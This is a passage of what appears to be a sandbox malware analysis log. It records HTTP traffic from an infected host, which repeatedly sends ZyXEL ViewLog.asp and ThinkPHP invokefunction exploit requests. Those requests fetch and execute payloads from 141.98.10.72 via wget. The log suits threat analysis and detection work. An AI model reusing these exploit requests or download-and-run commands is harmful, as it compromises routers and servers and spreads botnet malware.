                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        842192.168.2.144643895.86.93.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.404782057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.145368895.9.53.2128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.411820889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.144751831.200.60.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.412781954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.1447824112.25.103.20880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.454494953 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.145204288.221.97.6780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.554387093 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.756836891 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 62 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 36 39 34 26 23 34 36 3b 37 39 64 63 38 36 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bb341060&#46;1707899694&#46;79dc866</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.143750888.198.201.2280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.554723978 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.757524967 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.143385888.99.65.4580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.562588930 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.772398949 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.145437488.153.89.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.569295883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.815357924 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.145440088.217.34.5180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.570841074 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:54.798901081 CET513INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 319
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 65 72 76 65 72 74 68 69 6e 6b 63 65 6e 74 72 65 2e 66 72 69 74 7a 2e 62 6f 78 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at serverthinkcentre.fritz.box Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.144932094.125.121.698080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.623950958 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:54.856342077 CET388INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:34:54 GMT
                                                        Connection: Close
                                                        Cache-Control: no-store
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=3123412; includeSubDomains
                                                        Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *; upgrade-insecure-requests


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.143348094.123.45.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.654232025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.145037062.29.82.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.654290915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.143406894.122.63.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.657762051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.144595094.123.191.1998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.661185026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.144890294.187.96.558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.668108940 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.1456000112.74.82.24580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:54.742402077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:56.740443945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:57.118057013 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>
                                                        Feb 14, 2024 09:35:04.598232985 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 14 Feb 2024 08:34:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.144740231.136.157.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:56.143052101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:56.772566080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:58.052438974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.708365917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.829900026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:16.067760944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:36.546822071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
